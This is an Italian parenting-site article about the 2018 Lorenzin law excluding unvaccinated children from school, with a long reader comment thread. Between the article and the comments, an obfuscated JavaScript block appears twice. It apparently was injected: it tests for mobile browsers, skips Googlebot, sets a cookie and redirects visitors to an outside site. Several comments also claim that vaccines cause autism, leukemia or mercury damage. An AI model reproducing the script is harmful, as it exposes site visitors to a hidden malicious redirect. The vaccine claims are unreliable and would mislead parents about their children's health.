Bambini senza vaccino fuori dalle scuole dal 10 marzo

I bimbi non vaccinati e senza le opportune autocertificazioni, non saranno piA? ammessi a scuola a partire dal prossimo 10 marzo. La legge Lorenzin entrerAi?? in vigore al 100% poco dopo le elezioni politiche del 2018. Il ministro della Salute uscente, Beatrice Lorenzin ha fatto sapere che la battaglia contro i no vax non la spaventa e infatti, ha sottolineato come la minaccia alla salute pubblica delle personeAi??che cercano di evitare la diffusione obbligatoria del vaccino sia molto piA? importante di qualunque campagna elettorale. Saranno inoltre previste delle sanzioni economicheAi??per i genitori che per ideologia non vaccineranno i propri figli.

La legge sulle vaccinazioni obbligatorie

Secondo il Decreto vaccini voluto dal ministro Lorenzin e dalla collega Valeria Fedeli, a partire dal 7 giugno 2017 e con data ultima del prossimo 10 marzo, le vaccinazioni saranno obbligatorie. Questa legge A? arrivata dopo il progressivo calo delle vaccinazioni che aveva fatto sorgere delle epidemie relativamente a delle malattie che erano state debellate.

Secondo il decreto, le vaccinazioni ai minori di etAi?? compresa dai 0 ai 16 anni sono obbligatorie per la anti-poliomelitica, l'anti-difterica, anti-tetanica, anti-epatite b, anti-pertosse, anti-influenza b, anti-morbillo, anti-parotite, anti-varicella e anti-rosolia. Consigliate sono invece le vaccinazioni anti-meningococcica B, anti-meningococcica c- anti-pneumococcica e anti-rotavirus.

Il parere dei pediatri sulle vaccinazioni

Ad essere d'accordo sull'obbligo di vaccinazione sono anche la maggior parte dei pediatri italiani che, anzi, stanno cercando di portare avanti una battaglia per informare la popolazione circa i veri rischi e le opportunitAi?? che sono in grado di garantire i vaccini.

Quello che preoccupa molto i genitori no vax, che molto spesso hanno preso alcuni dati provenienti da fonti alternative come base delle loro dichiarazioni, sono le reazioni avverse ai farmaci. Ma, secondo l'Aifa e le dichiarazioni riportate dalla segreteria Fimp di Pistoia dei Medici Pediatri, sarebbero solo 5 mila quelle del 2016, registrate nell'arco di tempo successivo alla vaccinazione, mentre invece sono stati somministrati 12 milioni di dosi di vaccino.

Le reazioni avverse che possono essere anche piA? o meno lievi, non possono essere prese come esempio di dati distorti che vanno utilizzati per creare disinformazione. Anzi, secondo i pediatri la vaccinazione A? sempre una tutela della collettivitAi?? in quanto sono tantissimi i bambini, gli uomini e le donne che sono in salute grazie alla vaccinazione. Tutte le malattie prevedibili con la somministrazione del vaccino riescono a garantire il salvataggio di migliaia di vite ed A? per questo motivo che l'accordo con i pediatri sotto questo aspetto A? massimo e il Ministero della Salute e della sanitAi?? pubblica ha fatto sapere che continuerAi?? a portare avanti la battaglia per la vaccinazione obbligatoria.

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

173 comments

    • Irene Addobbati 1 marzo, 2018 at 23:45 Rispondi

      In realtà si parla solo di scuola non dell’obbligo, quindi da 0 a 6 anni, e per scuola pubblica e parificata. Se una scuola materna non è purificata, legata quindi al ministero dell’istruzione, la legge non è applicabile.
      In più l’allontanamento può essere fatto solo per quei bambini i cui genitori hanno fatto l’autocertificazione che entro il 10 marzo si sarebbero messi in regola.

    • Kamila Teresa Swijas 2 marzo, 2018 at 07:34 Rispondi

      Sia per quello ma sia perché c’è l’obbligo di scuola e diritto allo studio, se negavano l’accesso alla scuola dell’obbligo questa legge avrebbe poca vita! Comunque quando di mezzo ci sono i soldi sti politici si inventano di tutto anche la legge che dovrebbe essere fatta sotto un epidemia ma senza epidemia….mah
      poi la fa quella solo con la maturità…

  1. Anna MafeGi 1 marzo, 2018 at 19:56 Rispondi

    A causa di questi genitori che ora dovranno vaccinare i figli non c’è più un posto per far fare i richiami a chi avevano effettuato le prime vaccinazioni 😡🤬

  2. Daniela Centi 1 marzo, 2018 at 20:40 Rispondi

    Se tanto I vostri bimbi sono vaccinati,state tranquilli,(se funzionano)chi ha avuto un danno da vaccino,o teme malattie autoimmune,autismo,cancro e leucemie,come riscontrato tra I militari allora e meglio pagare la babysitter o la multa,le sperimentazioni farmaceutiche fatele sulle cavie,non sui bambini,mi dovete venire a prendere a casa prima di mettere le mani addosso alle mie figlie,visto che la piu grande ha sviluppato diversi nevi autoimmuni dopo il vaccino mpr

  3. Sara Pira 1 marzo, 2018 at 21:18 Rispondi

    Ma che leggi???i vostri figli sono delle cavie da laboratorio….in questo modo date da mangiare alle case farmaceutiche….poi che paure avete se i vostri figli sono vacinati…dovremmo averne più noi….o no????e poi è scuola Dell obbligato non te li tengono a casa…..

    • Sabrina Caltagirone 2 marzo, 2018 at 06:01 Rispondi

      La paura è, oltre a i danni per gli immunodepressi, che se un virus per il quale si vaccina, ad esempio il morbillo che ormai è diventato abbastanza raro ( o lo era),comincia a circolare su molti soggetti ( i non vaccinati) si moltiplica in continuazione. Più un virus si moltiplica più può andare in contro a mutazioni. Come succede ogni anno con il virus dell’influenza. Il punto è se il virus muta in modo significativo il vaccino risulta non essere più efficace perché , a tutti gli effetti, non è più il virus per cui si è stati vaccinati.

  4. Novella Bongiorno 1 marzo, 2018 at 21:30 Rispondi

    I vaccini ci sono sempre stati, mai c’è stata così tanta battaglia come adesso, da quando sono stati resi obbligatori e aumentati di numero.
    Mi chiedo io, cara Lorenzin e caro governo, perché non ci aiutate a capire? Non siamo informati, ci hanno obbligato.
    Chi vuole, s’informa come meglio può, ma ci sono troppi pareri, discordanti, anche i medici alle volte non sanno da che parte stare.

  5. Sandy Maccarelli 1 marzo, 2018 at 21:41 Rispondi

    Mi sembra di sentire un disco rotto che si ripete sui commenti no vax che leggo. I bambini usati come cavie ? Siamo in Itali e siamo nel 2018 e ringraziando il cielo c’è un’altissima tutela sui minori in tutti gli ambiti che questa affermazione viene smentita da sola. I vaccini provocando il cancro ? Le leucemie ? L’autismo ? Vi prego basta, informatevi – su siti attendibili però ! Dare i soldi alle aziende farmaceutiche ? Le aziende farmaceutiche guadagnato di più con le cure che devono essere fatte a chi non è vaccinato e contrae il morbillo, ad esempio, che non nelle dosi dei vaccini che devono essere somministrate. Basta andare sui siti ufficiali e farai due conti. È vero c’è molta cecità: negli occhi dei no vax che si fanno abbindolare dai venditori di fumo e si fanno usare per trasmettere la mala informazione !

    • Daniela Centi 1 marzo, 2018 at 22:09 Rispondi

      Noi del 1973 abbiamo avuto tutti il morbillo varicella curati a casa,mia figlia malattia autoimmune dopo mpr,si e riempita di nevi di sutton,come mai I bimbi vaccinati di oggi sono colpiti di piu dalle leucemie come I militari?e l epidemia di autismo?fanno bene I metalli pesanti?

    • Sandy Maccarelli 1 marzo, 2018 at 22:23 Rispondi

      Daniela Centi io sono del 1985 e ho fatto sia i vaccini che alcune malattie, come la varicella. E sono ancora viva. Ma questo non è una prova che il vaccino sia valido, come la sua affermazione non è una prova che non lo sia oppure che essere scampati a complicazioni significa che non sono malattie che portino alla morte. Per questo esiste La Scienza. La scienza grazie alla quale se lei ha la febbre può prendere la tachipirina, la stessa grazie alla quale se suo figlio sta male e lo porta all’ospedale lo curano, la stessa grazie alla quale a mio marito è stato diagnosticato un cancro e fortunatamente è stato curato in tempo. La stessa grazie alla quale L’ aspettativa di vita aumenta. Le domande che lei mi porge non hanno relazioni tra loro e io non sono neanche un medico che ha tutte le risposte. Ma dato che so di non essere un medico, e quindi di NON avere le competenze per farlo, quando ho un qualsiasi problema o dubbio mi rivolgo a loro, che salvano vite, migliaia, anzi no milioni, di vite tutti i giorni in tutto il mondo proprio grazie alla scienza che HA DIMOSTRATO che il vaccino non provoca l’autismo e che è il migliore dei modi per contrastare (debellare) malattie MORTALI.

    • Eva Spadotto 2 marzo, 2018 at 07:51 Rispondi

      Daniela Centi, c’è chi è allergico alle noccioline, gridiamo al complotto contro la natura?
      Può succede di avere reazioni allergiche ad un farmaco ma se lo stesso aiuta milioni di persone non è giusto che vada tolto dalla circolazione, lei andrà dal suo medico, dirà che la tachipirina la fa svenire e il medico le troverà il farmaco più adatto alla sua situazione.

    • Daniela Centi 2 marzo, 2018 at 07:55 Rispondi

      Conosco bambini danneggiati fall mpr e pure mia figlia maggiore,molto meglio l immunita naturale che abbiamo avuto noi,che era per sempre e non provocava danni al sistema immunitario,fatevele voi 7 vaccini,a me non mi toccate piu

    • Sandy Maccarelli 2 marzo, 2018 at 08:04 Rispondi

      Daniela Centi è interessante che, di tutto il discorso, l’unica cosa che l’ha colpita è la tachipirina. L’ho citata perché è la più usata, anche da pazienti che hanno gravi problemi cardiaci. Ma il mio voleva solo essere un esempio. Quindi secondo il suo ragionamento, si dovrebbe vietare di curare il cancro con la chemioterapia ?

    • Sara Muzic 2 marzo, 2018 at 09:04 Rispondi

      Purtroppo si, esistono bambini allergici, come d’altronde lo si è per moltissime altre cose. Io so solo che prendere certe malattie da adulti è pericolosissimo e si rischia di morire, so che in ospedale (mia mamma lavora in pediatria come infermiera) finisco bimbi piccolissimi contagiati da malattie portate da chi non è vaccinato e rischiano la morte anche loro, so che mia figlia se prendesse la meningite resterebbe gravemente menomata, so che purtroppo in molti credono che i vaccini provochino l’autismo, ma si anche che questo problema si presente semplicemente nella fascia di età coincidente con la dose di certi vaccini e che non è provato che siano essi a provocarlo. Io sono dell’84 e il mio compagno del 78, entrambi vaccinati a tutto, i miei addirittura sono andati in Austria a comprare certi vaccini che in Italia non avevano. Ho messo tutto sulla bilancia e mia figlia l’ho vaccinata, per lei e per tutti quei bambini e quelle persone che per certe patologie non possono farli, perché se certe malattie non esistono più non è certo opera dello spirito santo e fidatevi, le case farmaceutiche campano sulle malattie degli altri, non certo su un qualcosa che cerca di evitarle

    • Rosanna Loiaconi 2 marzo, 2018 at 09:18 Rispondi

      Ma sapere cosa contengono i vaccini? Sapete che vaccinate i vostri figli per l’epatite che si contrae attraverso il sangue e rapporti sessuali? Ci sono tanti video, seminari che parlano dei vaccini. Io aspetto la ministra Lorenzin appena avrà suo figlio. La cassata che anche le donne in gravidanza devono vaccinarsi? E poi è stata la prima lei a non farlo e smettirla. C’è un grosso guadagno per le case farmaceutiche e ci speculano. Un bambino di solo tre mesi a cui viene introdotto una quantità tale di mercurio, avete mai visto come danneggia il tutto?

    • Lara Boer 2 marzo, 2018 at 16:26 Rispondi

      Mamme dei bambini vaccinati, mi spiegate perché temete tanto il contagio se i vostri bimbi sono “protetti” dai vaccini? E scusate, ma siete sicure che sono le persone non vaccinate a trasmettere queste malattie di cui parlate? Tenete i bimbi lontano dai nonni allora perché vi assicuro che loro di vaccini ne hanno fatti ben pochi! Se credete che i genitori no Vax siano ossessionati dall’autismo allora non avete capito niente, le motivazioni che portano a tali scelte vanno ben oltre. Io rispetto tutti i genitori, pro o no Vax che siano, la cosa importante è che ogni scelta sia consapevole e informata, cosa che noi e TUTTI I GENITORI NO VAX abbiamo fatto e non leggendo STRONZATE su internet ma da medici che semplicemente hanno coscienza di informare a 360*! Insegnare a mia figlia il rispetto per gli altri e a usare la propria testa oltre al cuore, questo è tutto!

  6. Alessia Marino 1 marzo, 2018 at 21:43 Rispondi

    Speriamo che a breve oltre che dalle scuole sia proibito l’accesso ai non vaccinati in qualsiasi luogo pubblico come parchi centri ricreativi e sportivi centri commerciali supermercati farmacie e qualsiasi altro luogo così che chi non vaccina può solo tenerseli a casa propria i figli dove non possono recare danni

  7. Floppina Floppina 1 marzo, 2018 at 21:51 Rispondi

    Io ho due bambini e devo dire che prima di vaccinarli sono stata molto combattuta se farlo i meno, alla fine ho deciso di effettuare tutti i vaccini dopo essermi informata in maniera mooolto dettagliata ma la cosa che mi ha convinto a farlo è stato il pensiero che i miei figli sicuramente saranno cittadini del mondo e non solo dell’Italia e forse con i vaccini avrei potuto preservarli da eventuali malattie che esistono ancora in altri Paesi …. ritengo che questa sia una decisione difficile da prendere e molto personale e l’obbligatorietà non è la soluzione!

    • Irene Addobbati 1 marzo, 2018 at 23:41 Rispondi

      Il suo augurio su di me è arrivato, ho avuto tutte le malattie esentematiche nell’arco di 4 anni. Mi manca solo la parorite, ma la Lorenzin non mi obbliga a vaccinarmi.
      Se la legge fosse stata completa avrebbe dovuto comprendere anche gli adulti non vaccinati e che non hanno mai contratto malattia.
      Ma cosi non è e paradossalmente io posso tranquillamente frequentare posti in cui sono presenti immunodepressi.

    • Mauro Cicchetti 2 marzo, 2018 at 08:05 Rispondi

      Commento credo assai sciocco! Io ho avuto tutte le malattie e mi sono curato da solo! Vado in giro e nessuno mi chiede il certificato di vaccinazione, e non lo chiedono neanche al negretto fuori al supermercato che sono certo non abbia i vaccini! Però se mia figlia non fa il vaccino non può andare all’asilo. Quindi lo stato la condanna ad essere asociale e non ha più diritto ad acculturarsi! Qui non si giudica l’efficacia o meno di un vaccino! Qui si parla di garantire a persone che la pensano diversamente il diritto di vivere normalmente! Senza la paura che i figli non possano andare a scuola e che ai genitori venga tolta la patria potestà! Si chiama democrazia! Quanti morti fanno morbillo e varicella? Pochi! Quanti morti fanno i tumori al seno o alla prostata? Molti! Allora perché non si obbligano le persone a fare le analisi preventive?

    • Catia Marchettini 2 marzo, 2018 at 16:08 Rispondi

      Gli immigrati sono i primi a vaccinarsi perché sanno bene cosa vuol dire morire per un semplice raffreddore.provi a parlare con la pediatra dei suoi figli e rimarrà sorpresa dal fatto che la percentuale maggiore di vaccini la richiedono proprio gli extracomunitari.

    • Michela Agosti 3 marzo, 2018 at 10:08 Rispondi

      Queste malattie sono tornate perchè non ci si vaccina più! Non perchè le portano gli extracomunitari. E basta con questi pregiudizi per favore. Chi viene da paesi dove le mamme farebbero di tutto pur di vaccinare i figli ha più coscienza di noi, per questo loro per primo usufruiscono del sistema sanitario. Le malattie sono più spaventose dei vaccini

    • Catia Marchettini 4 marzo, 2018 at 17:19 Rispondi

      Negli altri stati non ci sono leggi che obbligano a vaccinarsi perché si vaccina punto e basta.invece no,noi lanciamo la pericolosissima moda dei non vaccini.perché vogliamo sostituirci anche a chi studia da una vita.però,guarda un po,le mamme contro i vaccini,a loro tempo sono state vaccinate e protette da malattie pericolose.a mia zia non fecero l’anti polio……è una vita che sogna di correre libera in un prato.per mettersi le scarpe la mattina,impiega 1ora e 15 minuti.andatelo a dire a lei che i vaccini non sono importanti…….

    • Kristina Jelic 4 marzo, 2018 at 23:43 Rispondi

      Io sono extracomunitaria….prima di venire in italia sia a me che al mio cane sono state controllate le vaccinazioni!
      E basta con sti extracomunitari (nel senso dispregiativo)….
      B A S T A!!! E prima erano i terroni, poi i foresti, ora gli extracomunitari….dev’esserci sempre un colpevole per forza?

  8. Madalina Moglan 2 marzo, 2018 at 00:10 Rispondi

    Ma io mi domando voi tutti questi genitori di bambini non vaccinati da piccoli siete stati vaccinati ???? Sicuramente siii !!! Allora avete x caso cancro leucemia siete autistici???? Io ho vaccinato mio figlio ma non quando hanno voluto loro lo fatto quando ho voluto io e come ho voluto io e poi prima di farlo mi sono informata da chi dovevo e da chi ha studiato ste cose e non di certo non mi sono informata su facebook o sui siti come fanno gli altri . Quello non significa essere informati sulla questione quello significa copiare ed incollare o pure condividere . Ognuno fa cio che vuole con i propri figli xo non potete sapere mai cio che puo succedere. Ps. Quando sento la frase tipo mio figlio/a non e vaccinato e non si e ammalato/a mai invece i vostri vaccinato sono sempre ammalati mi viene da ridere xk i loro figlio hanno tosse e sempre raffreddore e poi vengono fuori con la frase ha un sistema immunitario forte e non ha bisogno di vaccini . Poi se chiedi se hanno fatto delle analisi a sti figli x vedere veramente se hanno un sistema immunitario forte o debole ti rispondono di No.😂😂😂

    • Eva Spadotto 2 marzo, 2018 at 09:33 Rispondi

      Si chiama mamme.it, probabilmente è una pagina frequentata per regolamento solo da mamme e quindi solo loro possono rispondere, se vai in altre pagine aperte a tutti vedrai quanti papà rispondono alla stessa maniera

    • Mamme.it 2 marzo, 2018 at 09:57 Rispondi

      Eva Spadotto non c’è nessun regolamento. Si tratta di una pagina pubblica, chiunque può leggerla, seguirla, commentarla, anche papà, nonni, zii o persone single! :)

    • Je Suis Irèn 2 marzo, 2018 at 10:30 Rispondi

      Benissimo risponderò alla stessa maniera ai papà se mi capiterà! Vaccinare deve essere una scelta, è una scelta complicata quindi nessuno starà a giudicare se giusta o sbagliata. Per chi non conoscesse la convenzione di Oviedo cita: nessun trattamento medico sanitario dev’essere somministrato senza consenso del paziente, ergo : questa è una legge anticostuzionale e chi applaude a una legge del genere è uno sciocco che non merita i sacrifici fatti per diventare un paese democratico

    • Je Suis Irèn 2 marzo, 2018 at 10:34 Rispondi

      Tra l’altro mi scuso, non penso affatto ci siano donne stupide, solo mamme disinformate, ma l’emozione fa straparlare. Auguro a tutte le mamme del mondo di fare una scelta consapevole per i propri figli e auguro a tutta l’umanità di spezzare le proprie catene di schiavitù. ❤ pace

  9. Patrizia Pellicano 2 marzo, 2018 at 05:07 Rispondi

    Qui in Messico funziona così già da tempo, per iscrivere mia figlia a scuola vogliono la ” cartilla de vacunación “, e in ospedale quando ricoveri i bambini o li porti dal pediatra la devi presentare obligatoriamente, se non ce l hai attualizzata ti mandano con i servizi sociali, che poi ti stanno dietro finchè non la vaccini. Comunque qui allergie, malattie autoimmuni, autismo etc etc nella popolazione pediatrica sono scarse, quasi assenti. Il fattore genetico e ambientale rimane alla base di molte malattie credo.

  10. Pat Cio 2 marzo, 2018 at 06:48 Rispondi

    Irene Addobbati non ti ci confondere con questa gente dammi retta 😊per fortuna esiste la libertà di pensiero e non è un reato quello 😘😘😘

  11. Mauro Cicchetti 2 marzo, 2018 at 10:39 Rispondi

    Il punto non è se i vaccini funzionano o meno. Il punto è che alle famiglie bisognerebbe garantire il diritto di scegliere senza avere la paura di vedersi togliere la patria potestà o di vedere i figli asociali perche non possono andare all’asilo! Per me questa si chiama democrazia! È da sciocchi non vedere che dietro queste leggi nascoste dietro l’interesse della comunità si celano solo ed esclusivamente interessi economici! Non mi sembra che il morbillo o la varicella causino ecatombe di persone! Eppure tanto impegno affinché i bambini non si ammalino! Ma come mai non si vietano le sigarette o gli alcolici? Fanno molti più morti del morbillo! Eppure sono legali! Solo perche ci sono interessi economici dietro come ci sono per i vaccini! Allora tornando al punto! Perche non si una la stessa democrazia per i vaccini di quella che si usa per i tabacchi? Perche uno può decidere di morire per il fumo ma non può decidere se ammalarsi e poi con molta probabilità guarire autonomamente dal morbillo? I vaccini sono estremamente importanti per le malattie altamente rischiose o invalidanti come la poliomielite ecc. Io non.sono un no vax, mia figlia è vaccinata! Non vedo però perchevsi debba violare la democrazia e la libertà di decidere di ogni famiglia a favore di un paventato effetto gregge, di cui lo stesso creatore ha riconosciuto non funzionare!

  12. Sara Muzic 2 marzo, 2018 at 17:21 Rispondi

    Purtroppo si, esistono bambini allergici, come d’altronde lo si è per moltissime altre cose. Io so solo che prendere certe malattie da adulti è pericolosissimo e si rischia di morire, so che in ospedale (mia mamma lavora in pediatria come infermiera) finisco bimbi piccolissimi contagiati da malattie portate da chi non è vaccinato e rischiano la morte anche loro, so che mia figlia se prendesse la meningite resterebbe gravemente menomata, so che purtroppo in molti credono che i vaccini provochino l’autismo, ma si anche che questo problema si presente semplicemente nella fascia di età coincidente con la dose di certi vaccini e che non è provato che siano essi a provocarlo. Io sono dell’84 e il mio compagno del 78, entrambi vaccinati a tutto, i miei addirittura sono andati in Austria a comprare certi vaccini che in Italia non avevano. Ho messo tutto sulla bilancia e mia figlia l’ho vaccinata, per lei e per tutti quei bambini e quelle persone che per certe patologie non possono farli, perché se certe malattie non esistono più non è certo opera dello spirito santo e fidatevi, le case farmaceutiche campano sulle malattie degli altri, non certo su un qualcosa che cerca di evitarle

  13. Liliana Scuto 2 marzo, 2018 at 18:57 Rispondi

    Basti pensare che il vaccino e’ l’unico mezzo sicuro per proteggere i nostri bambini e già solo per questo non dovremmo nemmeno discuterne… ad ogni modo non vi e’ correlazione accertata tra vaccini e malattie tipo autismo , leucemie… o morte…sono sempre conseguenze su bambini che già di loro purtroppo hanno una predisposizione genetica. Basterebbe fare delle analisi preliminare e saremmo tutti d’accordo 😅

  14. Camilla Inserra 3 marzo, 2018 at 00:04 Rispondi

    Parlo da mamma che ha vaccinato il proprio figlio, e che dopo se posse tornare indietro non lo vaccinerebbe, per il semplice fatto che mio figlio è diventato autistico, sono contraria ai vaccini, lo sono sempre stato e da stupida mi sono fatta condizionare da chi diceva che erano importanti. Aprite gli occhi e la mente, ci fanno credere che tutelano la salute dei nostri figli è solo un enorme business delle case farmaceutiche e noi e i nostri figli siamo solo i loro topi da laboratorio. Un altro figlio non lo vaccinerò, e poi? Esistono le scuole private!!!
